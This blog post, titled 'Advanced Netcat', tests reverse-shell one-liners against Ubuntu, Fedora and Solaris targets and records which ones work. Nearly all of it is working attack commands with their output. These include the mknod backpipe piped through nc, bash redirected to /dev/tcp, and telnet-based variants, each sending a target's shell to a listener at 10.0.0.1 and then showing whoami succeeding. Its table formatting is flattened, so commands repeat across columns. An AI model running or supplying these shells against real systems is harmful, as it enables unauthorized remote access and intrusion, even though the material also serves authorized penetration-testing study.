Advanced Netcat

I wanted to build a post around -> http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

That post has quite a few little tricks into getting your shell.  I wanted to do some experimentation using various distributions of Linux to make sure they all function similarily.

Example 1 (mknod)

Client (Kali 1.0.6 x64 VM) Target (Ubuntu 12.04.4 LTS Server) Target (Fedora 20 x64) Target (Solaris 10 x86)
1. client@client:~$ nc -lvvp 8888
2. target@target:~$ mknod backpipe p && nc 10.0.0.1 8888 0<backpipe | /bin/bash 1>backpipe 2. target@target:~$ mknod backpipe p && nc 10.0.0.1 8888 0<backpipe | /bin/bash 1>backpipe 2. target@target:~$ mknod backpipe p && nc 10.0.0.1 8888 0<backpipe | /bin/bash 1>backpipe
3. Connection from 10.0.0.2 port 8888 [tcp/*] accepted
whoami
target
   red-x-iconSolaris doesn’t have nc by default 

Example 2 (/devraw TCP sockets)

Client (Kali 1.0.6 x64 VM) Target (Ubuntu 12.04.4 LTS Server) Target (Fedora 20 x64) Target (Solaris 10 x86)
1. client@client:~$ nc -lvv 8888
2. target@target:~$ /bin/bash -i > /dev/tcp/10.0.0.1/8888 0<&1 2>&1 2. target@target:~$ /bin/bash -i > /dev/tcp/10.0.0.1/8888 0<&1 2>&1 2. target@target:~$ /bin/bash -i > /dev/tcp/10.0.0.1/8888 0<&1 2>&1
3. Connection from 10.0.0.2 port 8888 [tcp/*] accepted
target@target:~$ whoami
whoami
target
     red-x-icon
/
dev/tcp/10.0.0.1/8888: cannot create

 

Example 3 (mknod + telnet)

Client (Kali 1.0.6 x64 VM) Target (Ubuntu 12.04.4 LTS Server) Target (Fedora 20 x64) Target (Solaris 10 x86)
1. client@client:~$ nc -lvv 8888
2. target@targe:~$ mknod backpipe p && telnet 10.0.0.1 8888 0<backpipe | /bin/bash 1>backpipe
/bin/bash: line 1: Trying: command not found
/bin/bash: line 2: Connected: command not found
/bin/bash: line 3: Escape: command not found
2. target@targe:~$ mknod backpipe p && telnet 10.0.0.1 8888 0<backpipe | /bin/bash 1>backpipe 2. target@targe:~$ mknod backpipe p && telnet 10.0.0.1 8888 0<backpipe | /bin/bash 1>backpipe
/bin/bash: line 1: Trying: command not found
/bin/bash: line 2: Connected: command not found
/bin/bash: line 3: Escape: command not found
3. Connection from 10.0.0.2 port 8888 [tcp/*] accepted
whoami
target
   red-x-icon
bash: telnet: command not found…
 

 

Example 4 (Telnet to Telnet)

Client (Kali 1.0.6 x64 VM) Target (Ubuntu 12.04.4 LTS Server) Target (Fedora ?) Target (Solaris 10 x86)
1. client@client:~$ nc -lvv 8888
2. client@client:~$ nc -lvv 4444
3. target@target:~$ telnet 10.0.0.1 8888 | /bin/bash | telnet 10.0.0.1 4444 3. target@target:~$ telnet 10.0.0.1 8888 | /bin/bash | telnet 10.0.0.1 4444 3. target@target:~$ telnet 10.0.0.1 8888 | /bin/bash | telnet 10.0.0.1 4444
4. Connection from 10.0.0.2 port 8888 [tcp/*] accepted
whoami
5. (from the 4444 listener)
target
   red-x-icon
bash: telnet: command not found…
 

 

Comments are closed